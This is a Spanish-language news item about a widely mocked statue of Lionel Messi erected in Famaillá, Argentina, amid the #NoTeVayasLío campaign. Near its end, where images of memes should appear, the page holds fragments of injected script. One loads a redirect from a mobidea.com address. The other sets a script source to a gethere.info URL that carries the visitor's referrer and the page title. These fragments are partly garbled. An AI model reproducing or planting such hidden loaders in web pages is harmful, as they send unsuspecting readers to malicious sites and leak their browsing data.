Piden a Messi que no se vaya de la selección argentina con una estatua muy… extravagante

En la ciudad argentina de Famaillá, intentaron homenajear al crack argentino con una escultura de dudoso parecido
Tras el anuncio del astro argentino Lionel Messi sobre su posible retiro del seleccionado de su país, las palabras de afecto y de apoyo hacia el crack del Barcelona se multiplicaron por todo el planeta del futbol.

Tal es así que, en Argentina, las calles y las redes sociales explotaron durante varios días con la consigna #NoTeVayasLío, en un intento colectivo por lograr que ‘La Pulga’ reconsidere su decisión y continúe jugando con la Albiceleste.

Y a más de una semana de la derrota argentina en la Final de la Copa América Centenario, todavía hay aficionados que quieren sumar su gesto al pedido dirigido al astro sudamericano.

O al menos lo intentan. Como un grupo de vecinos de la ciudad argentina de Famaillá, una localidad ubicada en el corazón de la provincia de Tucumán, donde esculpieron y colocaron en la vía pública una particular estatua de Lionel Messi que ha sido motivo de burlas y memes en las redes sociales por su extraño parecido con el jugador surgido en La Masía.

Es que la ‘escultura’ de 1,60 (y bastante mal gusto) se asemeja más a un muñeco de futbolito gigante y el único parecido con Messi es la playera a bastones verticales albiceleste que porta la ‘obra’.

Tras la versión ‘Ecce Homo’ de uno de los mejores jugadores del planeta, los memes no se hicieron esperar:

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios